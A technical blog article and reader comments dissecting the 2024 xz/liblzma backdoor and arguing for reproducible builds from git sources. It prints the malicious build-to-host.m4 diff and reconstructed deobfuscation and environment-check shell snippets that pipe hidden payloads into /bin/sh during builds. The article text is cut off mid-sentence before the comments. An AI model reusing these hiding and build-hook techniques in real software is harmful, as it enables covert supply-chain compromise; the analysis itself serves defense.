In March 2024, a backdoor was discovered in xz, a (de)compression software package that is regularly used at the core of Linux distributions to unpack source tarballs of packaged software. The backdoor had been covertly inserted by a malicious maintainer operating under the pseudonym Jia Tan over a period of three years. This event deeply stunned the open source community, as the attack was both massive in impact (it allowed remote code execution on all affected machines that had ssh installed) and extremely difficult to detect. In fact, it was only thanks to the diligence (and maybe luck) of Andres Freund – a Postgres developer working at Microsoft – that the catastrophe was avoided: while investigating a seemingly unrelated 500ms performance regression in ssh that he was experiencing on several Debian unstable machines, he traced it back to the liblzma library, identified the backdoor and documented it.
While it was already established that the open source supply chain is a frequent target of malicious actors, what is stunning is the amount of energy Jia Tan invested to gain the trust of the maintainer of the xz project, acquire push access to the repository and then – among other perfectly legitimate contributions – insert, piece by piece, the code for a very sophisticated and obfuscated backdoor. This should be a wake-up call for the OSS community. We should treat the open source supply chain as a high-value target for powerful threat actors, and collectively find countermeasures against such attacks.
In this article, I'll discuss the inner workings of the xz backdoor and how I think we could have mechanically detected it thanks to build reproducibility.
The main intent of the backdoor is to allow remote code execution on the target by hijacking the ssh program. To do that, it replaces the behavior of some of ssh's functions (most importantly RSA_public_decrypt) so that an attacker can execute arbitrary commands on a victim's machine when a specific RSA key is used to log in. Two main pieces are combined to install and activate the backdoor:

- A script to de-obfuscate and install a malicious object file as part of the xz build process. Interestingly, the backdoor was not entirely contained in the source code of xz. Instead, the malicious components were only present in tarballs built and signed by the malicious maintainer Jia Tan and published alongside releases 5.6.0 and 5.6.1 of xz. These release tarballs contained slight, disguised modifications that extract a malicious object file from the .xz files used as data for some tests contained in the repository.
- A procedure to hook the RSA_public_decrypt function. The backdoor uses the ifunc mechanism of glibc to modify the address of RSA_public_decrypt when ssh is loaded, in case ssh links against liblzma through libsystemd.
Info
The rest of this section goes into the details of the two steps mentioned above. Reading it is not necessary to understand the rest of the article. The most important takeaway here is that the backdoor was only active when using the maintainer-provided release tarball.
1. A script to de-obfuscate and install a malicious object file as part of the xz build process

As explained above, the malicious object file is stored directly in the xz git repository, hidden in test files. Since the project is decompression software, its test cases include .xz files to be decompressed, which makes it possible to hide machine code inside fake test files.
The backdoor is not active in the code contained in the git repository; it is only included when building xz from the tarball released by the project, which has a few differences from the actual contents of the repository, most importantly in the m4/build-to-host.m4 file.
diff --git a/m4/build-to-host.m4 b/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
dnl Define somedir_c.
gl_final_[$1]="$[$1]"
+ gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
dnl Translate it from build syntax to host syntax.
case "$build_os" in
cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
if test "$[$1]_c_make" = '"'"${gl_final_[$1]}"'"'; then
[$1]_c_make='"$([$1])"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_[$1]_config='sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+ else
+ gl_[$1]_config=''
+ fi
+ _LT_TAGDECL([], [gl_path_map], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+ _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+ _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
AC_SUBST([$1_c_make])
+
+ dnl If the host conversion code has been placed in $gl_config_gt,
+ dnl instead of duplicating it all over again into config.status,
+ dnl then we will have config.status run $gl_config_gt later, so it
+ dnl needs to know what name is stored there:
+ AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval $gl_[$1]_config"])
])
dnl Some initializations for gl_BUILD_TO_HOST.
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
+ dnl Search for Automake-defined pkg* macros, in the order
+ dnl listed in the Automake 1.10a+ documentation.
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
changequote(,)dnl
gl_sed_escape_for_make_1="s,\([ "&'();<>\\`|]\),\\\1,g"
changequote([,])dnl
While these changes may look benign and well commented to the naive eye, they actually hide a chain of commands (sketched below) that decrypts/deobfuscates several fake .xz test files to ultimately produce two files:

- a shell script that is run during the build of xz;
- a malicious binary object file.

There is an excellent analysis from Russ Cox that explains in detail how these two malicious resources are produced during the build process, and I advise any interested reader to find all the relevant details there.
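As a rough illustration, the first stage of that chain is roughly equivalent to the pipeline below. This is a sketch reconstructed from public analyses (notably Russ Cox's write-up), not the verbatim code; the test file names are the ones shipped in the 5.6.x release tarballs.

```sh
# Sketch of the first deobfuscation stage (reconstructed, not verbatim).
# sed "r\n" behaves like cat here (the 'r' command reads a non-existent file named "\n"),
# tr undoes a simple byte substitution so the "corrupt" file becomes a valid .xz stream,
# and xz -d decompresses it into a stage-2 shell script that is fed to the shell.
sed "r\n" tests/files/bad-3-corrupt_lzma2.xz \
  | tr "\t \-_" " \t_\-" \
  | xz -d \
  | /bin/sh
# The stage-2 script then extracts the malicious object file from
# tests/files/good-large_compressed.lzma (later stages omitted here).
```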
The shell script run during the build has two main purposes:

- Verifying that the conditions to execute the backdoor are met on the builder (the backdoor targets specific Linux distributions, needs specific glibc features enabled, needs ssh installed, etc.); a sketch of these checks follows this list.
- Modifying the (legitimate) liblzma_la-crc64_fast.o to use the _get_cpuid symbol defined in the backdoor object file.
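The snippet below is an illustrative reconstruction of the kind of gatekeeping the extracted script performs, based on published analyses of the 5.6.x tarballs; it is not the verbatim script, and the $build and $srcdir variables come from the autotools environment.

```sh
# Illustrative reconstruction of the build script's environment checks (not verbatim).
# Bail out silently unless the build environment matches the intended targets.
echo "$build" | grep -q "x86_64-linux-gnu" || exit 0        # x86-64, glibc-based Linux only
command -v gcc >/dev/null 2>&1 || exit 0                    # must be compiling with gcc
ld --version 2>/dev/null | grep -q "GNU ld" || exit 0       # and linking with GNU ld
# Only activate when a Debian or RPM package is being built, i.e. the builds that
# ship the distributions' libsystemd-enabled sshd.
{ [ -f "$srcdir/debian/rules" ] || [ "x$RPM_ARCH" = "xx86_64" ]; } || exit 0
```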
2. A procedure to hook the RSA_public_decrypt function

So how does a backdoor in liblzma, the library shipped by the xz project, have any effect on ssh?
To understand that, we have to take a little detour into the realm of dynamic loaders and dynamically linked programs. Whenever a program depends on a library, there are two ways that library can be linked into the final executable:

- statically, in which case the library is embedded into the final executable, hence increasing its size;
- dynamically, in which case it is the role of the dynamic loader (ld-linux.so on Linux) to find that shared library when the program starts and load it into memory.

When a program is compiled using dynamic linking, the addresses of the symbols belonging to dynamically linked libraries cannot be provided at compilation time: their position in memory is not known ahead of time! Instead, a reference to the Global Offset Table (or GOT) is inserted. When the program is started, the actual addresses are filled into the GOT by the dynamic loader.
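You can observe this machinery with standard binutils tools; /bin/ls is just a convenient dynamically linked example here.

```sh
# The shared libraries the dynamic loader must locate at startup
readelf -d /bin/ls | grep NEEDED
# The dynamic relocations (e.g. R_X86_64_GLOB_DAT / R_X86_64_JUMP_SLOT on x86-64):
# each entry is a GOT slot the loader fills with the address of a symbol
# found in one of those libraries.
objdump -R /bin/ls | head -n 20
```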
The xz backdoor uses a functionality of glibc called ifunc to force the execution of code at dynamic loading time: ifunc is designed to let a program select between several implementations of the same function when it is loaded.
#include <stdio.h>
// Declaration of ifunc resolver function
int (*resolve_add(void))(int, int);
// First version of the add function
int add_v1(int a, int b) {
printf("Using add_v1n");
return a + b;
}
// Second version of the add function
int add_v2(int a, int b) {
printf("Using add_v2n");
return a + b;
}
// Resolver function that chooses the correct version of the function
int (*resolve_add(void))(int, int) {
// You can implement any runtime check here.
// In that case we check if the system is 64bit
if (sizeof(void*) == 8) {
return add_v2;
} else {
return add_v1;
}
}
// Define the ifunc attribute for the add function
int add(int a, int b) __attribute__((ifunc("resolve_add")));
int main() {
int result = add(10, 20);
printf("Result: %dn", result);
return 0;
}
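To try the example, something like the following should work on a glibc-based Linux system with GCC; the file name is my own choice.

```sh
# Build and run the ifunc demo above (ifunc requires an ELF target and glibc).
gcc -O2 -o ifunc_demo ifunc_demo.c
./ifunc_demo    # on a 64-bit system this prints "Using add_v2" then "Result: 30"
```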
In the above example, the ifunc attribute attached to the add function indicates that the version to be executed is determined at dynamic loading time by running the resolve_add function. Here, resolve_add returns add_v1 or add_v2 depending on whether the running system is 64-bit or not – and as such is completely harmless – but the same technique is used by the xz backdoor to run malicious code at dynamic loading time.
But dynamic loading of which program? Well, of sshd! In some Linux distributions (Debian and Fedora, for example), sshd is patched to support systemd notifications and, for this purpose, links against libsystemd, which in turn links against liblzma. In those distributions, sshd therefore has a transitive dependency on liblzma.
[Figure: sshd and liblzma – the transitive dependency chain through libsystemd]
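Whether a given sshd binary is exposed to this chain can be checked directly; the path below is the usual Debian/Fedora location and may differ on other systems.

```sh
# Does this sshd pull in liblzma transitively (via libsystemd)?
ldd /usr/sbin/sshd | grep -E 'libsystemd|liblzma'
```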
This is how the backdoor works: whenever sshd is executed, the dynamic loader loads libsystemd and then liblzma. With the backdoor installed, and leveraging the ifunc functionality explained above, the backdoor is able to run arbitrary code while liblzma is being loaded. Indeed, as you remember from the previous section, the backdoor script modifies one of the legitimate xz object files: it alters the resolver of one of the functions that use ifunc so that it calls the backdoor's own malicious _get_cpuid symbol. When called, this function meddles with the GOT (which is not yet read-only at this point of execution) to modify the address of the RSA_public_decrypt function, replacing it with a malicious one! That's it: from this point on, sshd uses the malicious RSA_public_decrypt function, which gives the attacker remote code execution.
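Two hedged sanity checks are worth knowing here: RSA_public_decrypt is an ordinary dynamic symbol exported by OpenSSL's libcrypto, which is exactly what makes it reachable through GOT patching, and only the 5.6.0 and 5.6.1 releases shipped the malicious build machinery. The libcrypto path below is a typical Debian location and may differ on your system.

```sh
# RSA_public_decrypt is exported by libcrypto and resolved through the GOT at load time:
objdump -T /usr/lib/x86_64-linux-gnu/libcrypto.so.3 | grep -w RSA_public_decrypt
# Only the 5.6.0 and 5.6.1 release tarballs carried the malicious build machinery:
xz --version
```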
Once again, there exist more precise reports on exactly how the hooking happens that a curious reader may want to consult, like this one for example. There is also a research article summarizing the attack vector and possible mitigations that I recommend reading.
What should our takeaways be from this near-miss, and what should we do to minimize the risk of such an attack happening again in the future? Obviously, there is a lot to be said about the social issues at play here1 and about how we can build better resilience in the OSS ecosystem against malicious entities taking over truly fundamental OSS projects, but in this piece I'll only address the technical aspects of the question.
People are often convinced that OSS is more trustworthy than closed-source software because the code can be audited by practitioners and security professionals to detect vulnerabilities or backdoors. In this instance, such auditing was made difficult by the fact that part of the code activating the backdoor was not included in the sources available in the git repository, but was instead only present in the maintainer-provided tarball. While this served to hide the backdoor out of sight of most investigating eyes, it is also an opportunity for us to improve our software supply chain security processes.
Building software from trusted sources
One immediate observation we can make in reaction to this supply chain incident is that it was only effective because many distributions were using the maintainer-provided tarball to build xz instead of the raw source code supplied by the git forge (in this case, GitHub). This reliance on release tarballs has plenty of historical and practical reasons:

- the tarball workflow predates the existence of git and was used in the earliest Linux distributions;
- tarballs are self-contained archives that capture the exact state of the source code intended for release, while git repositories can be altered, creating the need for a snapshot of the code;
- tarballs can contain intermediary artifacts (for example manpages) used to lighten the build process, configure scripts to target specific hardware, etc.;
- tarballs allow the source code to be compressed, which is useful for space efficiency.
This being said, these reasons do not weigh enough in my opinion to justify the security risks they create. In all places where it is technically feasible, we should build software from sources authenticated by the most trustworthy party. For example, if a project is developed on GitHub, an a
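As a rough illustration of the gap between a release tarball and the repository it claims to come from, the two can be compared directly. The sketch below assumes the upstream GitHub repository and the 5.6.1 tarball; note that for autotools projects the tarball legitimately contains generated files (configure, gnulib m4 macros, manpages) that are absent from git, so the comparison requires human review rather than a simple pass/fail.

```sh
# Compare a git tag with the corresponding release tarball
# (URL, tag and directory names are assumptions for illustration).
git clone https://github.com/tukaani-project/xz
git -C xz archive --prefix=xz-from-git/ v5.6.1 | tar -x
tar -xf xz-5.6.1.tar.gz                 # the maintainer-provided tarball
diff -qr xz-from-git xz-5.6.1 | sort    # review files that differ and files present only in the tarball
```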
30 Comments
IshKebab
Yeah it certainly would have made hiding the backdoor more difficult. But far from impossible. You can always hide backdoors in source code if you want, it just takes more effort to make a plausible bug, and probably has a higher chance of detection.
ltbarcly3
Yes, if you use a trusted framework then you are safe from things until that framework is attacked. The xz backdoor might have been detected, but the xz backdoor wasn't crafted with the goal of working against the Nix ecosystem. When a nix core developer ends up being a spy or whatever then there will end up being an attack against the nix ecosystem. Don't reply to this with some claim that Nix is inherently secure unless you want me to track you down and make you admit you were wrong when Nix ends up getting successfully exploited in a year or two.
lolinder
Note that NixOS and reproducible builds did not detect the xz backdoor, and in fact NixOS shipped the malicious builds of xz (though they didn't do anything because the malware didn't target NixOS):
> I am a NixOS developer and I was surprised when the backdoor was revealed to see that the malicious version of xz had ended up being distributed to our users.
As always theory and reality are different, and the thing that made xz possible was never a technical vulnerability with a technical solution—xz was possible because of a meatspace exploit. We as a community are very very bad at recognizing that you can't always just patch meatspace with better software.
lotharcable
So the argument hinges on the fact that the XZ maintainer hid malicious code in the tarballs that were not checked into Git.
The author demonstrates that Nix can be configured to generate the tarballs from git that go into building the binaries.
What I don't see, however, is how this is a feature that requires Nix or NixOS?
Any build system out there (including the stuff that goes into RPMs and Debs) can be configured to generate tarballs as an intermediate step.
In fact making reproducible builds is a major thing that Debian has been working on for some time now.
https://wiki.debian.org/ReproducibleBuilds
rowanG077
It's somehow immensely funny to me that some state probably had an entire project to land this backdoor in xz and spent literal years to make it happen. And then it was immediately detected and all that effort was for nothing.
datadeft
could have / should have => being smart retrospectively
mcint
Excellent descriptive analysis. Wrong, misleading title, perhaps "technically correct," but at best with a "backdoored" meaning.
It points out the need and use for build-manager tools that go a step beyond union file system layers, but track then enforce that e.g. tests cannot pollute build artifacts. Take a causal trace graph of files affecting files, in the build process, make that trace graph explicit, and then build a way to enforce that graph, or report on deviations from previous trace graphs.
nialv7
I feel the author is a bit tunnel-visioned by what happened to happen this time. The Jia Tan incident has a sample size of one; it'd be a bit short-sighted to think that's the only way it could happen. You can imagine various scenarios where the defenses suggested here would not have worked.
Also I (as a nix user myself) think it's unlikely NixOS would have caught it. As evidenced by the fact that it didn't. (Yeah I realize I just said next time it might happen differently but it'd be foolish to put faith in nix without evidence).
MortyWaves
I don't like how this site causes my headphones to crackle…
donnachangstein
NixOS is really irrelevant here because the xz backdoor specifically targeted RedHat and Debian. It's equally relevant to say the xz backdoor didn't affect Windows (ironically the backdoor was ultimately found by a Microsoft employee, an oft-overlooked detail).
massysett
Article says that distributions should get source code directly from the VCS (for instance Github) rather than the traditional installation tarball.
I don’t see what this solves though. Couldn’t a malicious maintainer simply add binary blobs directly to the source code repository?
The author suggests Github is trusted, as though Github validates code in some way. Which of course it does not.
a-dub
llm commit scanning might be an interesting approach to the oss supply chain security problem.
__MatrixMan__
If we want to focus on a thing that NixOS could have prevented, we should focus on the CrowdStrike incident. Being able to boot to yesterday's config because today's config isn't working would've mitigated most of the problems.
dataflow
Why is nobody questioning this:
> To build xz from sources, we need autoconf to generate the configure script. But autoconf has a dependency on xz!
Both directions of this seem crazy to me.
1. Why the heck should a build configuration tool like autoconf be unable to function without a compression tool like xz? That makes no sense on its face.
2. For that matter, why the heck should xz, a tool that is supposedly so fundamental, have a hard dependency on a boilerplate generator like autoconf?
At the end of the day all autoconf is doing is telling you how to invoke your compiler. You ought to have a way to do that without the tool, even if it produces a suboptimal binary. If you care about security, instead of taking a giant tarball you don't understand and then running another tool in it, shouldn't you just generate that command line somehow (even in an untrusted fashion), review it, and then use that human-verified script to bootstrap?
And if you need a (de)compressor that low on the dependency tree so that literally the entire world might one day rest on it, surely you can isolate the actual computation for bootstrapping purposes and just expose it with just the open/read/write/close syscalls as dependencies? Why do you need all the bells and whistles?
wwarner
Learned a lot reading this article!